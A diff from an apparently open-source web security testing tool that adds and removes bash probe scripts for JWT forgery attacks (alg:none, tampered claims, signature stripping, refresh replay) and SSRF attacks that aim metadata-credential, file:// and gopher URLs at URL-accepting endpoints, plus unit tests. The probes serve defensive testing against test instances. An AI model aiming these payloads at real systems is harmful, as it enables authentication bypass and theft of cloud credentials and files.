+ else printf ' FAIL %-28s expected:%s actual:%s\n' "$1" "$2" "$3"; FAIL_COUNT=$((FAIL_COUNT+1)); FAIL_LINES+=("$1 expected $2 got $3"); fi
30
+ }
31
+ echo "=== JWT attacks vs $TEST_URL ==="
32
+ code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $ACCESS_TOKEN"); check "sanity (legit token)" "200" "$code"
33
+ DECODED_P=$(echo "$P" | python3 -c "import sys,base64; d=sys.stdin.read(); print(base64.urlsafe_b64decode(d+'=='*(4-len(d)%4)).decode())" 2>/dev/null || echo '{}')
34
+
35
+ NEW_H=$(printf '{"alg":"none","typ":"JWT"}' | b64url); code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${NEW_H}.${P}."); check "alg:none bypass" "401" "$code"
36
+ HS=$(printf '{"alg":"HS256","typ":"JWT"}' | b64url)
37
+ TP=$(printf '%s' "$DECODED_P" | python3 -c "import sys,json,time
38
+ try: d=json.loads(sys.stdin.read() or '{}')
39
+ except Exception: d={}
40
+ d['admin']=True; d['exp']=int(time.time())+3600
41
+ print(json.dumps(d))" 2>/dev/null || echo '{}')
42
+ TPB=$(printf '%s' "$TP" | b64url)
43
+ WSIG=$(printf '%s.%s' "$HS" "$TPB" | python3 -c "import sys,hmac,hashlib,base64; print(base64.urlsafe_b64encode(hmac.new(b'wrong-secret',sys.stdin.buffer.read(),hashlib.sha256).digest()).decode().rstrip('='))")
44
+ code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${HS}.${TPB}.${WSIG}"); check "tampered claims + wrong sig" "401" "$code"
45
+ EP=$(echo "$DECODED_P" | python3 -c "import sys,json,time;
46
+ try: d=json.loads(sys.stdin.read())
47
+ except: d={}
48
+ d['exp']=int(time.time())-60; print(json.dumps(d))" 2>/dev/null || echo '{}')
49
+ EPB=$(printf '%s' "$EP" | b64url); code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${H}.${EPB}.${S}"); check "expired exp" "401" "$code"
50
+ code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${H}.${P}."); check "stripped signature" "401" "$code"
51
+ code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer not-a-jwt"); check "garbage token" "401" "$code"
52
+
53
+ if [ -n "${REFRESH_TOKEN:-}" ]; then
54
+ curl -s -o /dev/null -X POST "$TARGET${LOGOUT_PATH:-/api/auth/logout}" -H "Authorization: Bearer $ACCESS_TOKEN" -H 'content-type: application/json' -d "{\"refreshToken\":\"$REFRESH_TOKEN\"}" || true
55
+ code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET${REFRESH_PATH:-/api/auth/refresh}" -H 'content-type: application/json' -d "{\"refreshToken\":\"$REFRESH_TOKEN\"}")
56
+ [ "$code" = "401" ] && echo " PASS refresh-after-logout (invalidated)" || echo " WARN refresh-after-logout actual:$code (stateless replay? document the tradeoff)"
57
+ fi
58
+
59
+ echo "=== Summary: PASS=$PASS_COUNT FAIL=$FAIL_COUNT ==="
60
+ [ "$FAIL_COUNT" -gt 0 ] && { printf ' - %s\n' "${FAIL_LINES[@]}"; exit 1; }
61
+ echo "All JWT attacks blocked — auth layer holds."
@@ -0,0 +1,62 @@
1
+ #!/usr/bin/env bash
2
+ # ssrf-probes.sh — SSRF probe, FACTS-driven. For each url-accepting endpoint the recon
3
+ # flagged (probe-context.json → ssrf_candidates), inject classic SSRF targets into that
4
+ # param and watch for IMDS/file/redis evidence or a tell-tale slow fetch. Expect
5
+ # 400/403/422 (host validation) or a clean 200 with no credential/IMDS content.
6
+ #
7
+ # Env (see _lib.py): TARGET, and usually TOKEN_A=<jwt> (or COOKIE_A) since these are
8
+ # typically admin/integration endpoints. Run only against a TEST instance.
9
+ set -uo pipefail
10
+ cd "$(dirname "$0")"
11
+ ctx=probe-context.json
12
+
13
+ TARGET="${TARGET:-$(python3 -c "import json;print(json.load(open('$ctx'))['target_base_url'])" 2>/dev/null)}"
14
+ if [ -z "${TARGET:-}" ] || [ "${TARGET#FILL}" != "$TARGET" ]; then echo "Set TARGET=http://host:port (or fill probe-context.json)"; exit 2; fi
15
+ AUTH=()
16
+ [ -n "${TOKEN_A:-}" ] && AUTH=(-H "Authorization: Bearer $TOKEN_A")
17
+ [ -z "${TOKEN_A:-}" ] && [ -n "${COOKIE_A:-}" ] && AUTH=(-H "Cookie: $COOKIE_A")
18
+ [ ${#AUTH[@]} -eq 0 ] && echo " (no TOKEN_A/COOKIE_A — probing unauthenticated; most SSRF sinks need auth)"
19
+
20
+ # url-accepting endpoints recon flagged → "METHOD /path PARAM" lines
21
+ CANDS=() # (portable; macOS ships bash 3.2 which lacks `mapfile`)
22
+ while IFS= read -r line; do [ -n "$line" ] && CANDS+=("$line"); done < <(python3 -c "
23
+ import json, re
24
+ for c in json.load(open('$ctx'))['endpoints'].get('ssrf_candidates', []):
25
+ m = re.match(r'(\w+)\s+(\S+).*param:\s*([\w.-]+)', c)
26
+ if m: print(m.group(1), m.group(2), m.group(3))
27
+ " 2>/dev/null)
28
+ if [ "${#CANDS[@]}" -eq 0 ]; then
29
+ echo "No SSRF candidates in probe-context.json (recon found no url/domain-ish params). N/A for this app."; exit 0
30
+ fi
31
+
32
+ SSRF_TARGETS=(
33
+ "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
34
+ "http://169.254.170.2/v2/credentials/"
35
+ "http://127.0.0.1/"
36
+ "http://10.0.0.1/"
37
+ "file:///etc/passwd"
38
+ "gopher://127.0.0.1:6379/_INFO"
39
+ )
40
+ fails=0; warns=0
41
+ for cand in "${CANDS[@]}"; do
42
+ read -r method path param <<< "$cand"
43
+ for url in "${SSRF_TARGETS[@]}"; do
44
+ body=$(python3 -c "import json,sys; print(json.dumps({sys.argv[1]: sys.argv[2]}))" "$param" "$url")
45
+ start=$(date +%s)
46
+ resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X "$method" "$TARGET$path" ${AUTH[@]+"${AUTH[@]}"} -H 'content-type: application/json' -d "$body" 2>&1 || true)
47
+ dur=$(( $(date +%s) - start ))
48
+ code=$(printf '%s' "$resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
49
+ bod=$(printf '%s' "$resp" | grep -v 'HTTP_CODE:' | head -c 200)
50
+ if printf '%s' "$bod" | grep -qE 'AccessKeyId|SecretAccessKey|InstanceId|root:x:0:0|redis_version'; then
51
+ printf ' FAIL %s %s [%s] %s → IMDS/file/redis CONTENT LEAKED\n' "$method" "$path" "${code:-?}" "$param=$url"; fails=$((fails+1))
52
+ elif [[ "$url" == *169.254.* && "$dur" -gt 5 ]]; then
53
+ printf ' WARN %s %s [%s,%ss] %s → slow; backend may have fetched it\n' "$method" "$path" "${code:-?}" "$dur" "$url"; warns=$((warns+1))
54
+ elif [[ "$code" =~ ^(400|403|422)$ ]]; then
55
+ printf ' ok %s %s [%s] %s validation rejected\n' "$method" "$path" "$code" "$url"
56
+ else
57
+ printf ' ? %s %s [%s] %s\n' "$method" "$path" "${code:-?}" "$url"
58
+ fi
59
+ done
60
+ done
61
+ echo "summary: $fails definitive SSRF · $warns suspicious (review)"
62
+ exit "$fails"
@@ -15,7 +15,8 @@ if [ -z "${BASE:-}" ] || [ "${BASE#FILL}" != "$BASE" ]; then
15
15
  echo "Set TARGET=http://host:port (or fill target_base_url in probe-context.json)"; exit 2
16
16
  fi
17
17
 
18
- mapfile -t EPS < <(python3 -c "import json;[print(e) for e in json.load(open('$ctx'))['endpoints']['writes']]" 2>/dev/null)
18
+ EPS=() # (portable; macOS bash 3.2 lacks `mapfile`)
19
+ while IFS= read -r line; do [ -n "$line" ] && EPS+=("$line"); done < <(python3 -c "import json;[print(e) for e in json.load(open('$ctx'))['endpoints']['writes']]" 2>/dev/null)
19
20
  if [ "${#EPS[@]}" -eq 0 ]; then
20
21
  echo "No write endpoints in probe-context.json — add 'METHOD /path' lines under endpoints.writes."; exit 2
21
22
  fi
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: websec-validator
3
- Version: 0.2.3
3
+ Version: 0.2.4
4
4
  Summary: Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app.
5
5
  Author: Ricardo Accioly
6
6
  License: MIT
@@ -172,6 +172,14 @@ class CalibrationTests(unittest.TestCase):
172
172
  class FieldFeedbackBatch1Tests(unittest.TestCase):
173
173
  """Regressions for the field-test false positives (proxy.ts, self-scan, ASIA)."""
174
174
 
175
+ def test_unsafe_decoder_feeding_auth_flagged(self): # F5
176
+ d = Path(tempfile.mkdtemp())
177
+ (d / "requireAdmin.ts").write_text(
178
+ "export function requireAdmin(req){ const p = decodeJwtPayloadUnsafe(req.cookies.t); if(!p.isAdmin) throw 0; }")
179
+ (d / "util.ts").write_text("export const add = (a,b) => a+b") # no auth + no unsafe → not flagged
180
+ out = AuthzExtractor().extract(RepoContext(d), {"routes": {"endpoints": []}})
181
+ self.assertIn("decodeJwtPayloadUnsafe", [u["decoder"] for u in out["unsafe_auth_decoders"]])
182
+
175
183
  def _next_app(self, proxy_body):
176
184
  d = Path(tempfile.mkdtemp())
177
185
  (d / "src").mkdir()
@@ -267,6 +275,22 @@ class ProbeStagingTests(unittest.TestCase):
267
275
  self.assertNotIn("security/pentest", blob)
268
276
 
269
277
 
278
+ class ExcludeAndScannerSelectTests(unittest.TestCase): # F4
279
+ def test_repocontext_honors_excludes(self):
280
+ d = Path(tempfile.mkdtemp())
281
+ (d / "src").mkdir(); (d / "keep").mkdir()
282
+ (d / "src" / "a.py").write_text("x=1")
283
+ (d / "keep" / "b.py").write_text("y=1")
284
+ ctx = RepoContext(d, excludes=["src"])
285
+ rels = {ctx.rel(p) for p in ctx.code_files}
286
+ self.assertIn("keep/b.py", rels)
287
+ self.assertNotIn("src/a.py", rels) # --exclude src dropped it
288
+
289
+ def test_scanner_argv_includes_user_excludes(self):
290
+ self.assertIn("docs", scanners._trivy(Path("/r"), Path("/o"), excludes=["docs"]))
291
+ self.assertIn("docs", scanners._semgrep(Path("/r"), Path("/o"), excludes=["docs"]))
292
+
293
+
270
294
  class RouteUnitTests(unittest.TestCase):
271
295
  def test_clean_path(self):
272
296
  self.assertEqual(routes._clean_path("/api/users/:id"), "/api/users/{id}")
@@ -284,12 +308,24 @@ class RouteUnitTests(unittest.TestCase):
284
308
  {"method": "GET", "url": "/items/<int:pk>", "params": [], "details": {"technology": "django", "code_paths": [{"path": "b"}]}},
285
309
  {"method": "GET", "url": "/assets/*.png", "params": [], "details": {}},
286
310
  ]
287
- paths = {(r["method"], r["path"]) for r in routes._normalize_noir(eps)}
311
+ app, _spec = routes._normalize_noir(eps)
312
+ paths = {(r["method"], r["path"]) for r in app}
288
313
  self.assertIn(("GET", "/api/x/{id}"), paths) # :id and {id} collapsed
289
314
  self.assertIn(("GET", "/items/{pk}"), paths) # django <int:pk> normalized
290
315
  self.assertNotIn(("GET", "/assets/*.png"), paths) # static-asset glob filtered
291
316
  self.assertEqual(sum(1 for _m, p in paths if p == "/api/x/{id}"), 1)
292
317
 
318
+ def test_vendored_spec_routes_split_out(self): # B1
319
+ eps = [
320
+ {"method": "GET", "url": "/api/sponsors", "details": {"code_paths": [{"path": "src/app/api/sponsors/route.ts"}]}},
321
+ {"method": "POST", "url": "/vault/accounts", "details": {"code_paths": [{"path": "docs-implementation/fireblocks-swagger.yaml"}]}},
322
+ {"method": "POST", "url": "/graphql", "details": {"code_paths": [{"path": "packages/cdk/schemas/appsync.graphql"}]}},
323
+ {"method": "GET", "url": "/users", "details": {"code_paths": [{"path": "node_modules/some-lib/openapi.json"}]}},
324
+ ]
325
+ app, spec = routes._normalize_noir(eps)
326
+ self.assertEqual([(r["method"], r["path"]) for r in app], [("GET", "/api/sponsors")]) # only the real handler
327
+ self.assertEqual(len(spec), 3) # swagger + graphql + node_modules openapi excluded
328
+
293
329
  def test_derive_targeting(self):
294
330
  d = routes._derive([
295
331
  {"method": "POST", "path": "/api/groups/{groupId}/items", "params": [{"name": "url", "where": "query"}]},
@@ -1,161 +0,0 @@
1
- #!/usr/bin/env bash
2
- #
3
- # jwt-attacks.sh — manual JWT attack probe.
4
- #
5
- # Six classic JWT attacks pentest teams run:
6
- #
7
- # 1. alg:none — sign with no algorithm. If the backend accepts it, total auth bypass.
8
- # 2. HS256 with garbage secret — tamper claims and resign with a wrong key.
9
- # 3. Expired token — exp in the past, expect 401.
10
- # 4. Stripped signature — empty sig segment.
11
- # 5. Garbage token — non-JWT string.
12
- # 6. Refresh-after-logout — logout, then try the still-cached refresh token.
13
- #
14
- # Usage:
15
- # 1. In .env, set ZAP_AGENT_USER / ZAP_AGENT_PASS.
16
- # 2. ./jwt-attacks.sh
17
- # 3. Output: one PASS/FAIL per attack; nonzero exit on FAIL.
18
- #
19
- # Requires: bash, curl, jq, python3.
20
- set -euo pipefail
21
- cd "$(dirname "$0")"
22
-
23
- [[ -f .env ]] || { echo "No .env found" >&2; exit 1; }
24
-
25
- read_env() {
26
- local key="$1"
27
- python3 -c "
28
- for l in open('.env'):
29
- l = l.rstrip('\n')
30
- if l.startswith('#') or '=' not in l: continue
31
- k, v = l.split('=', 1)
32
- if k.strip() == '$key':
33
- print(v); break
34
- "
35
- }
36
-
37
- TARGET="$(read_env ZAP_TARGET)"
38
- USER="$(read_env ZAP_AGENT_USER)"
39
- PASS="$(read_env ZAP_AGENT_PASS)"
40
-
41
- [[ -n "$TARGET" && -n "$USER" && -n "$PASS" ]] || {
42
- echo "ERROR: ZAP_TARGET / ZAP_AGENT_USER / ZAP_AGENT_PASS required in .env" >&2; exit 2
43
- }
44
-
45
- # TODO: adjust login / refresh / me / logout paths to your API.
46
- echo "==> mint legit token..."
47
- LOGIN_RESP=$(curl -fsS -X POST "$TARGET/api/auth/login" \
48
- -H 'Content-Type: application/json' \
49
- -d "$(jq -nc --arg e "$USER" --arg p "$PASS" '{email:$e,password:$p}')")
50
-
51
- ACCESS_TOKEN=$(echo "$LOGIN_RESP" | jq -r '.tokens.accessToken')
52
- REFRESH_TOKEN=$(echo "$LOGIN_RESP" | jq -r '.tokens.refreshToken')
53
-
54
- [[ -n "$ACCESS_TOKEN" && "$ACCESS_TOKEN" != "null" ]] || { echo "login failed" >&2; exit 3; }
55
-
56
- b64url() {
57
- python3 -c "import sys, base64; sys.stdout.write(base64.urlsafe_b64encode(sys.stdin.buffer.read()).decode().rstrip('='))"
58
- }
59
-
60
- IFS='.' read -r H P S <<< "$ACCESS_TOKEN"
61
-
62
- # A protected endpoint that requires a real session. Adjust to your API.
63
- TEST_URL="$TARGET/api/auth/me"
64
-
65
- PASS_COUNT=0
66
- FAIL_COUNT=0
67
- FAIL_LINES=()
68
-
69
- check() {
70
- local label="$1" expected_code="$2" actual="$3"
71
- if [[ "$actual" == "$expected_code" ]]; then
72
- printf ' %-4s %-30s expected:%s actual:%s\n' PASS "$label" "$expected_code" "$actual"
73
- PASS_COUNT=$((PASS_COUNT+1))
74
- else
75
- printf ' %-4s %-30s expected:%s actual:%s\n' FAIL "$label" "$expected_code" "$actual"
76
- FAIL_COUNT=$((FAIL_COUNT+1))
77
- FAIL_LINES+=("$label expected $expected_code got $actual")
78
- fi
79
- }
80
-
81
- # === Sanity: legit token works ===
82
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $ACCESS_TOKEN")
83
- check "sanity (legit token)" "200" "$code"
84
-
85
- # === Attack 1: alg:none ===
86
- DECODED_P=$(echo "$P" | python3 -c "import sys, base64; d=sys.stdin.read(); print(base64.urlsafe_b64decode(d + '=='*(4-len(d)%4)).decode())")
87
- NEW_H=$(echo -n '{"alg":"none","typ":"JWT"}' | b64url)
88
- NONE_TOKEN="${NEW_H}.${P}."
89
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $NONE_TOKEN")
90
- check "alg:none bypass" "401" "$code"
91
-
92
- # === Attack 2: HS256 with garbage secret + tampered claims ===
93
- # TODO: adjust claim names to your token's shape (role, roles, scope, permissions, etc.)
94
- TAMPERED_P=$(echo "$DECODED_P" | jq -c '.roleIds = ["role-platform-manager","role-developer"] | .iat = (now|floor) | .exp = ((now|floor) + 3600)')
95
- TAMPERED_P_B64=$(echo -n "$TAMPERED_P" | b64url)
96
- HEADER_HS256=$(echo -n '{"alg":"HS256","typ":"JWT"}' | b64url)
97
- WRONG_SIG=$(printf '%s.%s' "$HEADER_HS256" "$TAMPERED_P_B64" \
98
- | python3 -c "import sys, hmac, hashlib, base64; data=sys.stdin.buffer.read(); sig=hmac.new(b'wrong-secret-do-not-trust', data, hashlib.sha256).digest(); sys.stdout.write(base64.urlsafe_b64encode(sig).decode().rstrip('='))")
99
- TAMPERED_TOKEN="${HEADER_HS256}.${TAMPERED_P_B64}.${WRONG_SIG}"
100
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $TAMPERED_TOKEN")
101
- check "claims tampered, wrong sig" "401" "$code"
102
-
103
- # === Attack 3: expired token ===
104
- EXPIRED_P=$(echo "$DECODED_P" | jq -c '.exp = ((now|floor) - 60) | .iat = ((now|floor) - 3600)')
105
- EXPIRED_P_B64=$(echo -n "$EXPIRED_P" | b64url)
106
- EXP_SIG=$(printf '%s.%s' "$H" "$EXPIRED_P_B64" \
107
- | python3 -c "import sys, hmac, hashlib, base64; data=sys.stdin.buffer.read(); sig=hmac.new(b'will-not-match', data, hashlib.sha256).digest(); sys.stdout.write(base64.urlsafe_b64encode(sig).decode().rstrip('='))")
108
- EXP_TOKEN="${H}.${EXPIRED_P_B64}.${EXP_SIG}"
109
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $EXP_TOKEN")
110
- check "expired exp + bad sig" "401" "$code"
111
-
112
- # === Attack 4: stripped signature ===
113
- NO_SIG="${H}.${P}."
114
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $NO_SIG")
115
- check "stripped signature" "401" "$code"
116
-
117
- # === Attack 5: garbage token ===
118
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer not-a-jwt")
119
- check "garbage token" "401" "$code"
120
-
121
- # === Attack 6: refresh-token replay after logout ===
122
- echo "==> logging out then attempting refresh replay..."
123
- curl -fsS -X POST "$TARGET/api/auth/logout" \
124
- -H "Authorization: Bearer $ACCESS_TOKEN" \
125
- -H 'Content-Type: application/json' \
126
- -d "$(jq -nc --arg r "$REFRESH_TOKEN" '{refreshToken:$r}')" \
127
- >/dev/null 2>&1 || echo " (logout endpoint may not invalidate refresh tokens — continuing)"
128
-
129
- if [[ -n "$REFRESH_TOKEN" && "$REFRESH_TOKEN" != "null" ]]; then
130
- code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET/api/auth/refresh" \
131
- -H 'Content-Type: application/json' \
132
- -d "$(jq -nc --arg r "$REFRESH_TOKEN" '{refreshToken:$r}')")
133
- # Acceptable outcomes:
134
- # 401 — token was invalidated on logout (best)
135
- # 200 — refresh tokens are stateless and replay is possible (acceptable per
136
- # the project's auth model; document the tradeoff)
137
- if [[ "$code" == "401" ]]; then
138
- printf ' %-4s %-30s expected:401 actual:%s (refresh token invalidated on logout)\n' PASS "refresh-after-logout" "$code"
139
- PASS_COUNT=$((PASS_COUNT+1))
140
- elif [[ "$code" == "200" ]]; then
141
- printf ' %-4s %-30s expected:401 actual:%s (refresh tokens are stateless; document tradeoff)\n' WARN "refresh-after-logout" "$code"
142
- else
143
- printf ' %-4s %-30s expected:401 actual:%s\n' FAIL "refresh-after-logout" "$code"
144
- FAIL_COUNT=$((FAIL_COUNT+1))
145
- FAIL_LINES+=("refresh-after-logout got $code")
146
- fi
147
- else
148
- echo " (refresh token not present in login response — skip)"
149
- fi
150
-
151
- echo
152
- echo "=== Summary ==="
153
- echo " PASS: $PASS_COUNT"
154
- echo " FAIL: $FAIL_COUNT"
155
- if [[ $FAIL_COUNT -gt 0 ]]; then
156
- echo
157
- echo "FAILED:"
158
- printf ' - %s\n' "${FAIL_LINES[@]}"
159
- exit 1
160
- fi
161
- echo "All JWT attacks blocked — auth layer holds."
@@ -1,189 +0,0 @@
1
- #!/usr/bin/env bash
2
- #
3
- # ssrf-probes.sh — manual SSRF probe.
4
- #
5
- # Admin endpoints often accept URL-shaped fields (SSO domain, integration base
6
- # URLs, etc.). If a handler fetches those URLs server-side without validating
7
- # the host, an attacker who controls an admin account (or finds an admin auth
8
- # bypass) can force the backend to fetch AWS IMDS credentials, internal
9
- # services, or arbitrary intranet hosts.
10
- #
11
- # This probe attempts each known URL-accepting admin endpoint with classic
12
- # SSRF targets:
13
- # - 169.254.169.254 — AWS EC2 IMDSv1 metadata endpoint
14
- # - 169.254.170.2 — ECS task metadata
15
- # - 127.0.0.1:3000 — localhost
16
- # - 10.0.0.1 — RFC1918 internal
17
- # - file:// — local file scheme (some HTTP libraries support this)
18
- #
19
- # Expected: each request returns 400/403 (input validation refuses the host),
20
- # or 200 with an error body that does NOT contain credential material / IMDS
21
- # response shapes. A response time > 5s on an IMDS URL (without immediate
22
- # rejection) is a strong signal the backend actually fetched it.
23
- #
24
- # Usage:
25
- # 1. Set ZAP_ADMIN_USER / ZAP_ADMIN_PASS in .env.
26
- # 2. ./ssrf-probes.sh
27
- set -euo pipefail
28
- cd "$(dirname "$0")"
29
-
30
- [[ -f .env ]] || { echo "No .env found" >&2; exit 1; }
31
-
32
- read_env() {
33
- local key="$1"
34
- python3 -c "
35
- for l in open('.env'):
36
- l = l.rstrip('\n')
37
- if l.startswith('#') or '=' not in l: continue
38
- k, v = l.split('=', 1)
39
- if k.strip() == '$key':
40
- print(v); break
41
- "
42
- }
43
-
44
- TARGET="$(read_env ZAP_TARGET)"
45
- USER="$(read_env ZAP_ADMIN_USER)"
46
- PASS="$(read_env ZAP_ADMIN_PASS)"
47
-
48
- [[ -n "$TARGET" && -n "$USER" && -n "$PASS" ]] || {
49
- echo "ERROR: ZAP_TARGET / ZAP_ADMIN_USER / ZAP_ADMIN_PASS required in .env" >&2
50
- echo "SSRF probes need an admin account (system/integration permissions)" >&2
51
- exit 2
52
- }
53
-
54
- echo "==> minting admin token..."
55
- TOKEN=$(curl -fsS -X POST "$TARGET/api/auth/login" \
56
- -H 'Content-Type: application/json' \
57
- -d "$(jq -nc --arg e "$USER" --arg p "$PASS" '{email:$e,password:$p}')" \
58
- | jq -r '.tokens.accessToken')
59
- [[ -n "$TOKEN" && "$TOKEN" != "null" ]] || { echo "admin login failed" >&2; exit 3; }
60
-
61
- SSRF_TARGETS=(
62
- "http://169.254.169.254/latest/meta-data/"
63
- "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
64
- "http://169.254.170.2/v2/credentials/"
65
- "http://127.0.0.1:3000/api/admin/users"
66
- "http://10.0.0.1/"
67
- "http://[::1]:3000/"
68
- "file:///etc/passwd"
69
- "gopher://127.0.0.1:6379/_INFO"
70
- )
71
-
72
- FAIL_COUNT=0
73
- WARN_COUNT=0
74
- FAIL_LINES=()
75
-
76
- PROBE_PUT() {
77
- local label="$1" endpoint="$2" body_template="$3"
78
- for url in "${SSRF_TARGETS[@]}"; do
79
- local body
80
- body=$(echo "$body_template" | sed "s|{SSRF}|$url|g")
81
- local start end duration code body_resp
82
- start=$(date +%s)
83
- body_resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X PUT "$TARGET$endpoint" \
84
- -H "Authorization: Bearer $TOKEN" \
85
- -H 'Content-Type: application/json' \
86
- -d "$body" 2>&1 || true)
87
- end=$(date +%s)
88
- duration=$((end - start))
89
- code=$(echo "$body_resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
90
- body_clean=$(echo "$body_resp" | grep -v 'HTTP_CODE:' | head -c 200)
91
- evaluate_response "$label" "PUT $endpoint url=$url" "$code" "$duration" "$body_clean"
92
- done
93
- }
94
-
95
- PROBE_POST() {
96
- local label="$1" endpoint="$2" body_template="$3"
97
- for url in "${SSRF_TARGETS[@]}"; do
98
- local body
99
- body=$(echo "$body_template" | sed "s|{SSRF}|$url|g")
100
- local start end duration code body_resp
101
- start=$(date +%s)
102
- body_resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X POST "$TARGET$endpoint" \
103
- -H "Authorization: Bearer $TOKEN" \
104
- -H 'Content-Type: application/json' \
105
- -d "$body" 2>&1 || true)
106
- end=$(date +%s)
107
- duration=$((end - start))
108
- code=$(echo "$body_resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
109
- body_clean=$(echo "$body_resp" | grep -v 'HTTP_CODE:' | head -c 200)
110
- evaluate_response "$label" "POST $endpoint url=$url" "$code" "$duration" "$body_clean"
111
- done
112
- }
113
-
114
- evaluate_response() {
115
- local label="$1" probe="$2" code="$3" duration="$4" body="$5"
116
- if echo "$body" | grep -qE 'AccessKeyId|SecretAccessKey|InstanceId|root:x:0:0|redis_version'; then
117
- printf ' %-4s %s [code=%s, %ds] EVIDENCE OF SSRF in body!\n' FAIL "$probe" "$code" "$duration"
118
- FAIL_COUNT=$((FAIL_COUNT+1))
119
- FAIL_LINES+=("$label $probe — IMDS/file/redis content leaked")
120
- return
121
- fi
122
- if [[ "$probe" == *"169.254.169.254"* || "$probe" == *"169.254.170.2"* ]]; then
123
- if [[ "$duration" -gt 5 ]]; then
124
- printf ' %-4s %s [code=%s, %ds] slow response — backend may have fetched IMDS\n' WARN "$probe" "$code" "$duration"
125
- WARN_COUNT=$((WARN_COUNT+1))
126
- return
127
- fi
128
- fi
129
- if [[ "$code" == "400" || "$code" == "403" || "$code" == "422" ]]; then
130
- printf ' %-4s %s [code=%s, %ds] validation rejected\n' PASS "$probe" "$code" "$duration"
131
- return
132
- fi
133
- if [[ "$code" == "500" ]]; then
134
- printf ' %-4s %s [code=%s, %ds] backend errored — verify it did not attempt the fetch\n' WARN "$probe" "$code" "$duration"
135
- WARN_COUNT=$((WARN_COUNT+1))
136
- return
137
- fi
138
- if [[ "$code" == "200" ]]; then
139
- printf ' %-4s %s [code=%s, %ds] 200 OK no IMDS evidence (handled gracefully)\n' PASS "$probe" "$code" "$duration"
140
- return
141
- fi
142
- printf ' %-4s %s [code=%s, %ds]\n' PASS "$probe" "$code" "$duration"
143
- }
144
-
145
- # PROJECT-SPECIFIC START
146
- # These probes target the URL-accepting admin endpoints in your application.
147
- # REPLACE them with your project's endpoints. Look for any admin handler that
148
- # takes a URL/host/endpoint/domain field in its request body. Common shapes:
149
- # - SSO settings (issuer URL, metadata URL, callback)
150
- # - Integration config (webhook target, S3 endpoint, GraphQL URL)
151
- # - "Test connection" endpoints
152
-
153
- echo "=== SSO settings — typically accepts SSO domain / issuer URLs ==="
154
- PROBE_PUT "sso-settings" "/api/auth/sso/settings" \
155
- '{"enabled":true,"issuer":"{SSRF}","clientId":"x","clientSecret":"y","metadataUrl":"{SSRF}"}'
156
-
157
- echo
158
- echo "=== SSO test endpoint ==="
159
- PROBE_POST "sso-test" "/api/auth/sso/test" '{"domain":"{SSRF}"}'
160
-
161
- echo
162
- echo "=== Integration settings — third-party base URL etc. ==="
163
- PROBE_PUT "integrations" "/api/admin/integrations" \
164
- '{"providerBaseUrl":"{SSRF}","providerApiKey":"x"}'
165
-
166
- echo
167
- echo "=== Integration test endpoints ==="
168
- PROBE_POST "test-s3" "/api/admin/integrations/test/s3" \
169
- '{"awsS3Endpoint":"{SSRF}","awsS3Bucket":"test","awsS3Region":"us-east-1","awsS3AccessKeyId":"AKIA","awsS3SecretAccessKey":"x"}'
170
- PROBE_POST "test-graphql" "/api/admin/integrations/test/graphql" \
171
- '{"graphqlUrl":"{SSRF}","apiKey":"x"}'
172
- # PROJECT-SPECIFIC END
173
-
174
- echo
175
- echo "=== Summary ==="
176
- echo " FAIL (definitive SSRF evidence): $FAIL_COUNT"
177
- echo " WARN (suspicious — manual review): $WARN_COUNT"
178
- if [[ $FAIL_COUNT -gt 0 ]]; then
179
- echo
180
- echo "REAL SSRF FINDINGS:"
181
- printf ' - %s\n' "${FAIL_LINES[@]}"
182
- exit 1
183
- fi
184
- if [[ $WARN_COUNT -gt 0 ]]; then
185
- echo
186
- echo "Review the WARN lines manually — they may indicate the backend"
187
- echo "is fetching the URL even though no credential content leaked back."
188
- fi
189
- echo "No SSRF evidence found."